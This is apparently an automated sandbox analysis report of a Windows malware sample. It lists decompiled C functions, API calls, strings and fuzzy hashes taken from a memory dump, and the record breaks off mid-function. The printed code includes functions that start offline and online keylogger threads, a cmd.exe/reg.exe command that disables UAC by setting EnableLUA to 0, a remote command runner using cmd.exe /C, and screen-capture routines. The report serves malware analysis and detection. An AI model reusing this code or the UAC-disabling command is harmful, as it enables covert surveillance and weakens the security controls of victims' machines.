0x004157ce
0x004157d5
0x004157e1
0x004157e6
0x00415802
0x0041580a
0x00415823
0x0041582d
0x00415841
0x00415846
0x00415848
0x00415858
0x00415865
0x0041587a
0x00415883
0x0041589f
0x004158bf
0x004158cc
0x004158d8
0x004158e9
0x004158f0
0x004158ff
0x00415908
0x00415908
0x00415911
0x00415911
0x0041591a
0x00415923
0x00415937

APIs

Part of subcall function 00414906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
Part of subcall function 00414906: CreateCompatibleDC.GDI32(00000000), ref: 0041492D

SHCreateMemStream.SHLWAPI(00000000,00000000,png), ref: 004157C7

Part of subcall function 0041441B: GdipLoadImageFromStream.GDIPLUS(?,?), ref: 00414431

Part of subcall function 00414493: GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004144A4

Part of subcall function 004179DC: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9

DeleteFileW.KERNEL32(00000000,0000001B), ref: 00415858

Strings

image/png, xrefs: 004157E1
png, xrefs: 00415781
dat, xrefs: 004158A4

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Create$File$GdipImageStream$CompatibleDeleteFromLoadSave
String ID: dat$image/png$png
API String ID: 1095564277-186023265
Opcode ID: 775667cc21e8ef688f989a89bfb0c9f6235a0d29cd1d95de21b8bca7321ddca0
Instruction ID: 0c36451510116b7bd957a4aa3b7b106e47bf9e8d8c5c7fe72891902c2c8ac275
Opcode Fuzzy Hash: 775667cc21e8ef688f989a89bfb0c9f6235a0d29cd1d95de21b8bca7321ddca0
Instruction Fuzzy Hash: 304172711183409BC314FB62C852EEFB3A9AF95358F00093FF446671E2EF385A48C69A

Uniqueness

Uniqueness Score: -1.00%

Function 00408742, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70
threadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00408742(void* __ecx, char _a4) {
				char _v28;
				char _v32;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* _t21;
				void* _t39;
				signed int _t41;
				void* _t43;

				_t43 = (_t41 & 0xfffffff8) - 0x1c;
				_push(_t21);
				_t39 = __ecx;
				 *((char*)(__ecx + 0x49)) = 1;
				L00409DD2(__ecx + 0x60,  &_a4);
				_t47 =  *0x46a9d4 - 0x32;
				_t35 = "Offline Keylogger Started";
				if( *0x46a9d4 != 0x32) {
					E00402084(_t21,  &_v28, "Offline Keylogger Started");
					_t43 = _t43 - 0x18;
					E004172DA(_t43,  &_v32);
					E00409634(_t21, _t39, _t47);
					E00401FC7();
				}
				_t44 = _t43 - 0x18;
				E00402084(_t21, _t43 - 0x18, _t35);
				E00402084(_t21, _t44 - 0x18, "[Info]");
				L00416C80(_t21, _t35);
				CreateThread(0, 0, E0040884B, _t39, 0, 0);
				if( *_t39 == 0) {
					CreateThread(0, 0, E00408830, _t39, 0, 0);
				}
				CreateThread(0, 0, E0040885A, _t39, 0, 0);
				return L00401EF0();
			}

0x00408748
0x0040874e
0x00408750
0x00408757
0x0040875b
0x00408760
0x00408767
0x0040876c
0x00408773
0x00408778
0x00408781
0x00408788
0x00408791
0x00408791
0x00408796
0x0040879c
0x004087ab
0x004087b0
0x004087ca
0x004087ce
0x004087da
0x004087da
0x004087e6
0x004087f6

APIs

CreateThread.KERNEL32 ref: 004087CA
CreateThread.KERNEL32 ref: 004087DA
CreateThread.KERNEL32 ref: 004087E6

Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED

Strings

[Info], xrefs: 004087A6
Offline Keylogger Started, xrefs: 00408767, 0040876E, 0040879B

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateThread$EventLocalTimewsprintf
String ID: Offline Keylogger Started$[Info]
API String ID: 3534694722-3531117058
Opcode ID: 1e8aff02d5c109468fd494a4a84b3e52d0648772be4b1af5f9673befedfce18a
Instruction ID: e7dd77b1288fa42652556686635590a3b19cb298011fac88deeca58e0b290907
Opcode Fuzzy Hash: 1e8aff02d5c109468fd494a4a84b3e52d0648772be4b1af5f9673befedfce18a
Instruction Fuzzy Hash: 5711A7B21003083AD214B6668D86DBB3A5CDA9139CB40053FF985221D3EE785E59C6FA

Uniqueness

Uniqueness Score: -1.00%

Function 004093AD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65
threadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004093AD(void* __ecx) {
				char _v28;
				void* __ebx;
				void* __edi;
				void* _t7;
				void* _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t30 = __ecx;
				_t36 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					_t28 = "Online Keylogger Started";
					 *((char*)(__ecx + 0x4a)) = 1;
					E00402084(_t18,  &_v28, "Online Keylogger Started");
					_t32 = _t31 - 0x18;
					E004172DA(_t32,  &_v28);
					E00409634(_t18, _t30, _t36);
					E00401FC7();
					_t33 = _t32 - 0x18;
					E00402084(_t18, _t32 - 0x18, "Online Keylogger Started");
					E00402084(_t18, _t33 - 0x18, "[Info]");
					L00416C80(_t18, _t28);
					if( *((intOrPtr*)(_t30 + 0x49)) == 0) {
						if( *_t30 == 0) {
							CreateThread(0, 0, E00408830, _t30, 0, 0);
						}
						CreateThread(0, 0, E0040885A, _t30, 0, 0);
					}
					return CreateThread(0, 0, E00408869, _t30, 0, 0);
				}
				return _t7;
			}

0x004093b5
0x004093b8
0x004093bc
0x004093c2
0x004093c7
0x004093cf
0x004093d4
0x004093dc
0x004093e3
0x004093eb
0x004093f0
0x004093f6
0x00409405
0x0040940a
0x0040941d
0x00409421
0x0040942d
0x0040942d
0x00409439
0x00409439
0x00000000
0x00409445
0x0040944d

APIs

Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

CreateThread.KERNEL32 ref: 0040942D
CreateThread.KERNEL32 ref: 00409439
CreateThread.KERNEL32 ref: 00409445

Strings

Online Keylogger Started, xrefs: 004093C2, 004093CB, 004093F5
[Info], xrefs: 00409400

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateThread$LocalTime$Eventwsprintf
String ID: Online Keylogger Started$[Info]
API String ID: 3546759147-3401407043
Opcode ID: 252a10f4c7db2c3d790c08ea6cd02ea1070b72bc27798e53e0cb27eb6ddf0f2a
Instruction ID: 55f70c683c1dd9f299002b3fa9371d2aabc85af949f207a7a15db3bb5bde523d
Opcode Fuzzy Hash: 252a10f4c7db2c3d790c08ea6cd02ea1070b72bc27798e53e0cb27eb6ddf0f2a
Instruction Fuzzy Hash: 5501C8A16002193AD62476764C86DBF7A6CCA81398F80057FFA85321C3D97D5C4A82FA

Uniqueness

Uniqueness Score: -1.00%

Function 0040D3F7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46
processCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040D3F7() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v92;
				void* __edi;
				void* _t17;
				long _t19;

				_t19 = 0x44;
				L00431F00(_t17,  &_v92, 0, _t19);
				_v92.cb = _t19;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}

0x0040d402
0x0040d40b
0x0040d412
0x0040d41b
0x0040d41c
0x0040d41d
0x0040d41e
0x0040d43b
0x0040d44a
0x0040d457

APIs

CreateProcessA.KERNEL32 ref: 0040D43B
CloseHandle.KERNEL32(0040C5FB), ref: 0040D44A
CloseHandle.KERNEL32(00000027), ref: 0040D44F

Strings

C:\Windows\System32\cmd.exe, xrefs: 0040D436
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D431

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
Instruction ID: 26fca9c7a1bbdca23175ff39a315bbad59b3fabc2693cff21f74514230984448
Opcode Fuzzy Hash: ef92d07ca1aae4fdf93b7244d02a4cef1616cfdac0d91f616d34c415f3e09b10
Instruction Fuzzy Hash: BDF012B290061C7FEB105AE9DC85EEFBB6CEB48795F100476F604E6011D5715D148AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040519B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040519B(void* __ecx, void* __edi) {
				void* __ebx;
				long _t19;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				intOrPtr _t38;

				_t29 = __edi;
				_t30 = __ecx;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				if( *((intOrPtr*)(__ecx + 0x5c)) <= 0) {
					L3:
					 *((char*)(_t30 + 0x50)) = 0;
					_t38 =  *0x46bb03; // 0x0
					if(_t38 != 0) {
						_t32 = _t31 - 0x18;
						E00402084(0, _t31 - 0x18, "Connection timeout");
						E00402084(0, _t32 - 0x18, "[WARNING]");
						L00416C80(0, _t29);
					}
					E00404E0B(_t30);
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t19 = WaitForSingleObject( *(_t30 + 0x54), 0x3e8);
					 *((intOrPtr*)(_t30 + 0x60)) =  *((intOrPtr*)(_t30 + 0x60)) + 1;
					_t28 =  *((intOrPtr*)(_t30 + 0x60));
					if(_t19 == 0) {
						break;
					}
					if(_t28 <  *((intOrPtr*)(_t30 + 0x5c))) {
						continue;
					}
					goto L3;
				}
				CloseHandle( *(_t30 + 0x54));
				 *(_t30 + 0x54) = 0;
				 *((char*)(_t30 + 0x50)) = 0;
				SetEvent( *(_t30 + 0x58));
				return 0;
			}

0x0040519b
0x0040519d
0x004051a1
0x004051a7
0x004051c6
0x004051c6
0x004051c9
0x004051cf
0x004051d1
0x004051db
0x004051ea
0x004051ef
0x004051f4
0x004051f9
0x00000000
0x00000000
0x00000000
0x00000000
0x004051a9
0x004051a9
0x004051b1
0x004051b7
0x004051ba
0x004051bf
0x00000000
0x00000000
0x004051c4
0x00000000
0x00000000
0x00000000
0x004051c4
0x00405207
0x00405210
0x00405213
0x00405216
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405196), ref: 004051B1
CloseHandle.KERNEL32(?), ref: 00405207
SetEvent.KERNEL32(?), ref: 00405216

Strings

Connection timeout, xrefs: 004051D6
[WARNING], xrefs: 004051E5

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection timeout$[WARNING]
API String ID: 2055531096-1470507543
Opcode ID: 0ba4f2503bf5f0317bc10ecb581ea82cfaeb46762227d70d6f5b6137543dff9d
Instruction ID: 7da91c5eb563825218e032d44bddc69cdf30f244b65d1975d56df2ebc3a46463
Opcode Fuzzy Hash: 0ba4f2503bf5f0317bc10ecb581ea82cfaeb46762227d70d6f5b6137543dff9d
Instruction Fuzzy Hash: B801B131A41B40AFC721AF75884651BBBA4EF0530A700447EE5C3A6AA2CBB89404CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 004126DB, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004126DB(void* __edx, void* __ebp, void* __eflags, char _a16, char _a60, void* _a92, char _a96, void* _a128, void* _a152) {
				void* _t11;

				_t41 = __eflags;
				_t11 = E0040427F(0,  &_a96, L00401F95(L00401E49( &_a16, __edx, __eflags, 0)));
				_t35 = L"/C ";
				ShellExecuteW(0, L"open", L"cmd.exe", L00401EEB(E00404405(0,  &_a60, L"/C ", _t41, _t11)), 0, 0);
				L00401EF0();
				L00401EF0();
				_t6 =  &_a16; // 0x404538
				L00401E74(_t6, _t35);
				E00401FC7();
				E00401FC7();
				return 0;
			}

0x004126db
0x004126f5
0x004126fb
0x0041271d
0x00412727
0x0041318d
0x004133c4
0x004133c8
0x004133d4
0x004133e0
0x004133ed

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041271D

Strings

/C , xrefs: 004126FB
8E@, xrefs: 004133C4
cmd.exe, xrefs: 00412712
open, xrefs: 00412717

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: ExecuteShell
String ID: /C $8E@$cmd.exe$open
API String ID: 587946157-914314769
Opcode ID: 7aa96fee03e6401ac1b22889eba9856a68264f954b39489df8aa8793d1cc152a
Instruction ID: 47ea0f4151d847ad7c85bc2547405b4448f03a7c8d467b7d431ad20f766adf74
Opcode Fuzzy Hash: 7aa96fee03e6401ac1b22889eba9856a68264f954b39489df8aa8793d1cc152a
Instruction Fuzzy Hash: 6BF036711183415BC204FB72D8919BFB3A9AB90309F10083FB946A20E3EF385919865E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B82B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040B82B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v16;
				signed int _t34;
				signed int* _t49;
				signed int* _t57;
				void* _t65;
				signed int* _t66;

				_t65 = __ecx;
				E00430058(__ecx, 0);
				E0040D4A5(__ecx + 4);
				E0040D4A5(__ecx + 0xc);
				E0040D48F(__ecx + 0x14);
				E0040D48F(__ecx + 0x1c);
				E0040D4A5(__ecx + 0x24);
				E0040D4A5(__ecx + 0x2c);
				_t76 = _a4;
				if(_a4 == 0) {
					_t49 =  &_v16;
					E0040B7D0(_t49, "bad locale name");
					E0043205A( &_v16, 0x4685e0);
					asm("int3");
					_push(_t65);
					_t66 = _t49;
					E004303EB(_t66);
					E0040D48A( &(_t66[0xb]));
					E0040D48A( &(_t66[9]));
					E0040D48A( &(_t66[7]));
					E0040D48A( &(_t66[5]));
					E0040D48A( &(_t66[3]));
					E0040D48A( &(_t66[1]));
					_t57 = _t66;
					_t34 =  *_t57;
					__eflags = _t34;
					if(_t34 == 0) {
						return E0043F125(4);
					} else {
						__eflags = _t34 - 8;
						if(_t34 < 8) {
							_t37 = 0x46b050 + _t34 * 0x18;
							__eflags = 0x46b050 + _t34 * 0x18;
							return E004308FD(0x46b050 + _t34 * 0x18, _t37);
						}
						return _t34;
					}
				} else {
					E004303A0(__ebx, __edx, __edi, _t76, __ecx, _a4);
					return _t65;
				}
			}

0x0040b834
0x0040b836
0x0040b83e
0x0040b846
0x0040b84e
0x0040b856
0x0040b85e
0x0040b866
0x0040b86b
0x0040b86f
0x0040b88a
0x0040b88d
0x0040b89b
0x0040b8a0
0x0040b8a1
0x0040b8a2
0x0040b8a5
0x0040b8ae
0x0040b8b6
0x0040b8be
0x0040b8c6
0x0040b8ce
0x0040b8d6
0x0040b8db
0x004300b0
0x004300b2
0x004300b4
0x0043f14d
0x004300ba
0x004300ba
0x004300bd
0x004300c2
0x004300c2
0x00000000
0x004300cd
0x004300ce
0x004300ce
0x0040b871
0x0040b875
0x0040b882
0x0040b882

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040B836
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040B875

Part of subcall function 004303A0: _Yarn.LIBCPMT ref: 004303BF
Part of subcall function 004303A0: _Yarn.LIBCPMT ref: 004303E3

std::bad_exception::bad_exception.LIBCMT ref: 0040B88D
__CxxThrowException@8.LIBVCRUNTIME ref: 0040B89B

Strings

bad locale name, xrefs: 0040B885

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 3706160523-1405518554
Opcode ID: e4434316a2aa22c80a8ecccf78aeb5c6b4e9cbfc58a69b48d55e7b8d31bdf15a
Instruction ID: 089b12ecbc6339823181e46ec4ed0a9302f8c45fa17c933d22815baa8faf1e53
Opcode Fuzzy Hash: e4434316a2aa22c80a8ecccf78aeb5c6b4e9cbfc58a69b48d55e7b8d31bdf15a
Instruction Fuzzy Hash: 1DF031318042086BC228FAA5ED57A9A7374AF14754F50463FF946224D1EF7CB54DC68D

Uniqueness

Uniqueness Score: -1.00%

Function 0043CB8F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0043CB84,00000003,?,0043CB24,00000003,00468188,0000000C,0043CC37,00000003,00000002), ref: 0043CBAF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0043CBC2
FreeLibrary.KERNEL32(00000000,?,?,?,0043CB84,00000003,?,0043CB24,00000003,00468188,0000000C,0043CC37,00000003,00000002,00000000), ref: 0043CBE5

Strings

CorExitProcess, xrefs: 0043CBBA
mscoree.dll, xrefs: 0043CBA8

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2bff9b1b25c75f2ab9dfba9e343501fb02229992b6015e3b8712204befcae99e
Instruction ID: 0c177611bbbd006dab77ec3e98d2de005c4c22a3b60f3add798cea3a54e6debe
Opcode Fuzzy Hash: 2bff9b1b25c75f2ab9dfba9e343501fb02229992b6015e3b8712204befcae99e
Instruction Fuzzy Hash: B8F03130600218ABCB115F65EC4AB9EFFB5EB04752F1040BAF805A2291DB759A54CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0043B2BA, Relevance: 7.7, APIs: 5, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0043B2BA(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				signed int _t59;
				char* _t61;
				intOrPtr _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				void* _t106;
				intOrPtr _t108;
				intOrPtr _t109;
				int _t110;
				short* _t113;
				int _t114;
				int _t116;
				signed int _t117;

				_t106 = __edx;
				_t59 =  *0x46a00c; // 0x1e1e4200
				_v8 = _t59 ^ _t117;
				_t61 = _a4;
				_t91 = _a12;
				_t116 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t113 = _a8;
				_v24 = _t113;
				if(_t61 == 0 || _t91 != 0) {
					if(_t113 != 0) {
						E00435507(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
								if(_t64 == 0 || _v20 != _t116) {
									L55:
									_t65 = E0043A504();
									_t114 = _t113 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t114 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t113 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t114 = _t116;
								goto L56;
							}
							while(_t68 <= 0xff) {
								_t113 =  &(_t113[1]);
								_t116 = _t116 + 1;
								_t68 =  *_t113 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t108 = _v44;
						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
							if( *((intOrPtr*)(_t108 + 4)) != 1) {
								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
								if(_t114 == 0) {
									if(_v20 != _t116 || GetLastError() != 0x7a) {
										L45:
										_t71 = E0043A504();
										_t116 = _t116 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t109 = _v44;
											_t103 =  *(_t109 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
											_t93 = _a12;
											_t110 = _t74;
											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
												goto L55;
											}
											if(_t110 + _t114 > _t93) {
												goto L56;
											}
											_t76 = _t116;
											_v32 = _t76;
											if(_t110 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t114 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
												 *((char*)(_t105 + _t114)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t114 = _t114 + 1;
												_v32 = _t76;
												if(_t76 < _t110) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t116) {
									goto L45;
								}
								_t28 = _t114 - 1; // -1
								_t116 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
								if(_t116 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t116 - 1] == 0) {
										_t116 = _t116 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t113;
							_v24 = _t91;
							while( *_t83 != _t116) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t116 &&  *_t83 == _t116) {
								_t91 = (_t83 - _t113 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						while( *_t113 <= 0xff) {
							_t98[_t116] =  *_t113;
							_t85 =  *_t113;
							_t113 =  &(_t113[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t116 = _t116 + 1;
							if(_t116 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E0043A504())) = 0x16;
					E0043695D();
					goto L59;
				} else {
					L59:
					return L0042FD1B(_v8 ^ _t117);
				}
			}

0x0043b2ba
0x0043b2c2
0x0043b2c9
0x0043b2cc
0x0043b2d0
0x0043b2d4
0x0043b2d6
0x0043b2d9
0x0043b2dd
0x0043b2e0
0x0043b2e5
0x0043b2f4
0x0043b314
0x0043b319
0x0043b31e
0x0043b4bb
0x0043b4c4
0x0043b4f6
0x0043b4fe
0x0043b50a
0x0043b50a
0x0043b50f
0x0043b512
0x00000000
0x0043b505
0x0043b505
0x0043b505
0x0043b518
0x0043b51c
0x0043b521
0x0043b521
0x00000000
0x0043b528
0x0043b4fe
0x0043b4c6
0x0043b4cc
0x0043b4e4
0x0043b4e4
0x00000000
0x0043b4e4
0x0043b4d3
0x0043b4d8
0x0043b4db
0x0043b4dc
0x0043b4e2
0x00000000
0x00000000
0x00000000
0x0043b4e2
0x00000000
0x0043b4d3
0x0043b324
0x0043b32d
0x0043b367
0x0043b3e0
0x0043b3e4
0x0043b3fa
0x0043b4ab
0x0043b4ab
0x0043b4b0
0x0043b4b3
0x00000000
0x0043b40f
0x0043b411
0x00000000
0x00000000
0x0043b417
0x0043b41a
0x0043b41a
0x0043b41d
0x0043b423
0x0043b427
0x0043b427
0x0043b439
0x0043b43f
0x0043b442
0x0043b446
0x00000000
0x00000000
0x0043b46b
0x00000000
0x00000000
0x0043b471
0x0043b473
0x0043b478
0x0043b498
0x0043b49b
0x0043b49e
0x0043b4a3
0x00000000
0x00000000
0x00000000
0x0043b4a9
0x0043b47a
0x0043b47d
0x0043b47d
0x0043b481
0x0043b486
0x00000000
0x00000000
0x0043b48f
0x0043b490
0x0043b491
0x0043b496
0x00000000
0x00000000
0x00000000
0x0043b496
0x00000000
0x0043b47d
0x00000000
0x0043b41a
0x0043b3fa
0x0043b3e9
0x00000000
0x00000000
0x0043b3ef
0x0043b3ef
0x00000000
0x0043b3ef
0x0043b36b
0x0043b391
0x0043b3a4
0x0043b3a8
0x00000000
0x0043b3b8
0x0043b3c0
0x0043b3c6
0x0043b3c6
0x00000000
0x0043b3c0
0x0043b3a8
0x0043b36d
0x0043b36f
0x0043b372
0x0043b377
0x0043b37a
0x0043b37a
0x0043b37e
0x00000000
0x00000000
0x00000000
0x0043b37e
0x0043b383
0x0043b390
0x0043b390
0x00000000
0x0043b383
0x0043b331
0x00000000
0x00000000
0x0043b33c
0x0043b347
0x0043b34a
0x0043b34d
0x0043b353
0x00000000
0x00000000
0x0043b359
0x0043b35c
0x00000000
0x00000000
0x00000000
0x0043b35e
0x00000000
0x0043b33c
0x0043b2fb
0x0043b301
0x00000000
0x0043b2eb
0x0043b52a
0x0043b53a
0x0043b53a

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
Instruction ID: 0e8ff1e7bf94726707b95a2ea2eb2a738027cd1da7e878330fc773e679c7ecaa
Opcode Fuzzy Hash: 4f3e5902103fbf73d685bb82c023768945668d30e32b5126960101710bc94102
Instruction Fuzzy Hash: 5171D231900216ABCF21CF59C884BBFBB75EF59324F14222BEA1167282D7789D41C7E9

Uniqueness

Uniqueness Score: -1.00%

Function 00404486, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 208
sleepCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404486(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char** _a8, signed int _a12) {
				char _v8;
				void* _v40;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v76;
				void* __esi;
				void* __ebp;
				void* _t26;
				char** _t28;
				intOrPtr* _t30;
				char* _t38;
				intOrPtr _t48;
				signed int _t57;
				signed int _t59;
				char* _t62;
				void* _t66;
				signed int _t67;
				void* _t69;
				signed int _t78;
				void* _t81;
				void* _t129;
				signed int _t131;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t141;
				void* _t144;
				void* _t145;
				intOrPtr* _t146;

				_push(__edi);
				_t125 = _a8;
				_t129 = __ecx;
				_t26 = E004027DA(__ecx, _a8);
				_t81 = _t129;
				_t152 = _t26;
				if(_t26 == 0) {
					_push(__ebx);
					E004028B9(_t81, __edx, 0);
					_t28 = E0040223F();
					_t78 = _a12;
					_a8 = _t28;
					_t120 =  *_t28;
					__eflags =  !_t120 - _t78;
					if( !_t120 <= _t78) {
						E004028D8(_t129);
						asm("int3");
						_push(_t129);
						_t30 = L00401F95( &_v8);
						E004042A6( &_v8,  &_v44, 4, 0xffffffff);
						_t144 = (_t141 & 0xfffffff8) - 0xc;
						E004020EC(_t78, _t144, _t120, __eflags, 0x46c238);
						_t145 = _t144 - 0x18;
